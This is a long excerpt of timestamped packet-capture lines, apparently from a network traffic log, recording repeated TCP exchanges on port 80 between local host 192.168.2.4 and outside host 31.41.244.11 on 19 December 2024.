                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.611728907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.611746073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.611763954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.611799002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.622687101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.622705936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.622726917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.622797966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.623061895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.623095989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.623112917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.623130083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.623142004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.623153925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.623186111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.773720980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.773770094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.773785114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.773855925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.773896933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.774148941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.774199009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.774210930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.774243116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.774256945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.774300098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.775191069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.775207996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.775223970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.775247097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.775274992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776029110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776045084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776061058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776079893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776109934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776797056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776813030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776829004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776854992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.776880026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.777709961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.777731895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.777751923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.777765989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.777793884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.778534889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.778575897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.778575897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.778594971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.778615952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.778640985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.779479980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.779495955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.779511929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.779521942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.779537916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.779551029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.780664921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.780684948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.780704021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.780706882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.780715942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.780741930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.781243086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.781260014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.781275988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.781285048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.781299114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.781316042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.782138109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.782160997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.782176971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.782181025 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.782202959 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.782217026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783030987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783068895 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783077955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783098936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783122063 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783137083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783865929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783916950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783934116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783934116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783955097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.783967972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.784739971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.784786940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.784794092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.784810066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.784827948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.784845114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.785703897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.785720110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.785737991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.785757065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.785773039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.785789967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.786573887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.786590099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.786606073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.786628008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.786645889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.787435055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.787483931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.787529945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.787547112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.787573099 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.787587881 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.788577080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.788593054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.788626909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.788644075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.788666964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.788708925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.789484024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.789500952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.789518118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.789535046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.789550066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.790210962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.790247917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.790260077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.790263891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.790287018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.790301085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791023016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791059971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791066885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791078091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791100979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791111946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791903019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791918993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791937113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791945934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791961908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.791970968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.792855024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.792896986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.793087006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.793102026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.793118000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.793134928 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.793154001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.793164015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794004917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794049025 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794051886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794070005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794092894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794107914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794842958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794864893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794882059 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794884920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794894934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.794918060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.795743942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.795785904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.795789957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.795808077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.795829058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.795844078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.796679974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.796715975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.796725035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.796737909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.796760082 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.796773911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.797522068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.797548056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.797563076 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.797574997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.797591925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.797599077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.798439980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.798455000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.798471928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.798502922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.798527002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.799298048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.799354076 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.799360037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.799376011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.799401999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.799416065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.800209045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.800224066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.800240993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.800260067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.800275087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.801040888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.801093102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.801099062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.801115990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.801145077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.801161051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.801963091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.801991940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.802009106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.802017927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.802031994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.802052975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.812984943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.813000917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.813009024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.813143969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.813369036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.813385963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.813401937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.813417912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.813445091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.814304113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.814327002 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.814363003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.814389944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.966073036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.966089964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.966152906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.966207027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.966255903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.966335058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.966351986 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.966382027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.966397047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967134953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967161894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967175961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967178106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967204094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967217922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967876911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967894077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967911005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967916965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967933893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.967953920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.968715906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.968760967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.968765974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.968784094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.968806982 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.968818903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.969595909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.969660997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.969666958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.969685078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.969705105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.969723940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.970467091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.970505953 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.970529079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.970545053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.970565081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.970588923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.971375942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.971415997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.971426964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.971442938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.971465111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.971477985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.972245932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.972286940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.972290039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.972307920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.972328901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.972337961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.973129988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.973160982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.973171949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.973176956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.973201036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.973212957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.974071026 CET804986031.41.244.11192.168.2.4
